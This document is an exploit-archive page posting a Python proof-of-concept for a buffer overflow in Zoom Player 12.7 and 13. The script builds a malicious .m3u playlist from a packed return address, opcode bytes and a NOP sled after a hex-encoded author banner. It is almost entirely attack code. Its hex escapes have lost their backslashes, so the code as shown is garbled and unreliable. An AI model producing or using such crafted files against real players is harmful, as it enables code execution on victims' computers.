Home / os / winmobile

Zoom Player 12.7 / 13 Buffer Overflow

Posted on 08 February 2017

# Total :Zoom Player 12.7 & 13 'm3u' buffer
# Author:sultan

# tested on:win10
# st :http://filehippo.com/download_zoom_player_home/
# vid:https://www.facebook.com/pentest3/videos/vb.100012552940568/245326842562412/?type=2&theater&notif_t=video_processed&notif_id=1484236676829397
#------------------------------------------------------------------------
import struct
ban= 'x0dx0ax20x20x20x20x20x20x20x5cx20x20x20x2dx20x20'
ban+='x2dx20x20x2dx20x3cx73x65x72x76x65x72x3ex20x20x2d'
ban+='x20x5cx2dx2dx2dx3cx20x2dx20x2dx20x20x2dx20x2dx20'
ban+='x20x2dx20x20x2ax0dx0ax20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x2ax2ax2ax0dx0ax20x20x20'
ban+='x20x20x20x20x7cx20x20x20x20x44x6fx63x5fx41x74x74'
ban+='x61x63x6bx20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x2ax2ax2a'
ban+='x2ax2ax0dx0ax20x20x20x20x20x20x20x7cx20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x2ax2ax2ax2ax2ax2ax2ax0dx0ax20x20x20x20'
ban+='x20x20x20x76x20x20x20x20x20x20x20x20x60x20x60x2e'
ban+='x20x20x20x20x2cx3bx27x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x2ax2ax2ax2ax41x70x50'
ban+='x2ax2ax2ax2ax0dx0ax20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x60x2ex20x20x2cx27x2fx20x2ex27'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax0d'
ban+='x0ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x60x2ex20x58x20x2fx2ex27x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x2ax20x20x20x20x20x2ax2ax2a'
ban+='x2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax0dx0ax20x20x20x20'
ban+='x20x20x20x2ex2dx3bx2dx2dx27x27x2dx2dx2ex5fx60x20'
ban+='x60x20x28x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x2ax2ax2ax20x20x20x20x20x20x20x20x20x20x7cx0d'
ban+='x0ax20x20x20x20x20x2ex27x20x20x20x20x20x20x20x20'
ban+='x20x20x20x2fx20x20x20x20x27x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x2ax2ax2ax2ax2ax20x20x20x20x20x20'
ban+='x20x20x20x7cx20x64x61x74x61x62x61x73x65x0dx0ax20'
ban+='x20x20x20x20x3bx53x65x63x75x72x69x74x79x60x20x20'
ban+='x27x20x30x20x20x30x20x27x20x20x20x20x20x20x20x20'
ban+='x20x2ax2ax2ax4ex45x54x2ax2ax2ax20x20x20x20x20x20'
ban+='x20x7cx0dx0ax20x20x20x20x2cx20x20x20x20x20x20x20'
ban+='x2cx20x20x20x20x27x20x20x7cx20x20x27x20x20x20x20'
ban+='x20x20x20x20x20x20x2ax2ax2ax2ax2ax2ax2ax2ax2ax20'
ban+='x20x20x20x20x20x20x5ex0dx0ax20x2cx2ex20x7cx20x20'
ban+='x20x20x20x20x20x27x20x20x20x20x20x60x2ex5fx2ex27'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x7c'
ban+='x2dx2dx2dx2dx2dx2dx2dx5ex2dx2dx2dx5ex20x20x20x20'
ban+='x20x20x20x20x20x20x2fx0dx0ax20x3ax20x20x2ex20x60'
ban+='x20x20x3bx20x20x20x60x20x20x60x20x2dx2dx2cx2ex2e'
ban+='x5fx3bx2dx2dx2dx3ex20x20x20x20x20x20x20x20x20x7c'
ban+='x20x20x20x20x20x20x20x27x2ex27x2ex27x5fx5fx5fx5f'
ban+='x5fx5fx5fx5fx20x2ax0dx0ax20x20x27x20x60x20x20x20'
ban+='x20x2cx20x20x20x29x20x20x20x2ex27x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x5ex20'
ban+='x20x20x20x20x20x20x20x7cx5fx7cx20x46x69x72x65x77'
ban+='x61x6cx6cx20x29x0dx0ax20x20x20x20x20x60x2ex5fx20'
ban+='x2cx20x20x27x20x20x20x2fx5fx20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x7cx20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x7cx7cx20x20x20x20'
ban+='x7cx7cx0dx0ax20x20x20x20x20x20x20x20x3bx20x2cx27'
ban+='x27x2dx2cx3bx27x20x60x60x2dx5fx5fx5fx5fx5fx5fx5f'
ban+='x5fx5fx5fx5fx5fx5fx5fx5fx5fx5fx7cx0dx0ax20x20x20'
ban+='x20x20x20x20x20x20x60x60x2dx2ex2ex5fx5fx60x60x2d'
ban+='x2dx60x20x20x20x20x20x20x20x69x70x73x20x20x20x20'
ban+='x20x20x20x2dx20x20x20x20x20x20x20x20x20x20x20x5e'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x2fx0dx0ax20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x2dx20x20x20x20x20x20x20x20x27'
ban+='x2ex20x5fx2dx2dx2dx2dx2dx2dx2dx2dx2dx2ax0dx0ax20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x2dx5fx5fx5fx5fx5fx5fx5fx20'
ban+='x7cx5fx20x20x49x50x53x20x20x20x20x20x29x0dx0ax20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x7cx7cx20x20x20x20x20x7cx7cx0dx0ax20'
ban+='
'
ban+='x41x75x74x68x6fx72x3ax20x53x75x6cx74x61x6ex5fx41x6cx62x61x6cx61x77x69x0dx0ax65x78x70x6cx6fx69x74x20x3ax20x68x74x74x70x73x3ax2fx2fx77x77x77x2ex65x78x70x6cx6fx69x74x2dx64x62x2ex63x6fx6dx2fx61x75x74x68x6fx72x2fx3fx61x3dx38x37x34x31
'
ban+='x68x74x74x70x73x3ax2fx2fx77x77x77x2ex66x61x63x65x62x6fx6fx6bx2ex63x6fx6dx2fx70x65x6ex74x65x73x74x33
'
ban+="x61x6cx62x61x6cx61x77x69x34x70x65x6ex74x65x73x74x40x67x6dx61x69x6cx2ex63x6fx6d"
print ban
E = struct.pack("<L",0x745B52FB)
buffer = "x23x45x58x54x4dx33x55
x23"
buffer+= "x45x58x54x2dx58x2dx53x54x52"
buffer+= "x45x41x4dx2dx49x4ex46x3ax50"
buffer+= "x52x4fx47x52x41x4dx2dx49x44"
buffer+= "x3dx31x2cx42x41x4ex44x57x49"
buffer+= "x44x54x48x3dx31x2cx52x45x53"
buffer+= "x4fx4cx55x54x49x4fx4ex3dx31"
buffer+= "x32x30x78x33x36x30
"
buffere=("x53"+
"x56"+
"x57"
"x55"+
"x81xC4"+
"x50"+
"x83xC4"+
"x8BxF1"+
"x89x14x24"+
"x8BxF8"+
"x85xF6"+
"x7Fx09"+
"x8BxC7"+
"xE8"+
"xEBx5D"+
"x8Dx6E"+
"x81xFD"+
"x7Dx28"+
"x56"+
"x8Dx44x24"+
"x8Bx4Cx24"+
"xBA"+
"xE8"+
"x8BxD8"+
"x85xDB"+
"x7Ex0F"+
"x8Dx54x24"+
"x8BxC7"+
"x8BxCB"+
"xE8"+
"xEB"+
"x8BxDD"+
"x8BxC7"+
"x8BxD3"+
"xE8"+
"x56"+
"x8Bx07"+
"x8Bx4Cx24"+
"x8BxD3"+
"xE8"+
"x8BxD8"+
"x85xDB"+
"x7Dx02"+
"x33xDB"+
"x8BxC7"+
"x8BxD3"+
"xE8"+
"x81xC4 "+
"x5D"+
"x5F"+
"x5E"+
"x5B"+
"xC3"+
"x90"*15)
file = "zoom-exploit9.m3u"
buffer += file
open(file, "wb").write(buffer)
print "file done {}".format(file)

 

TOP

Malware :

Exploits :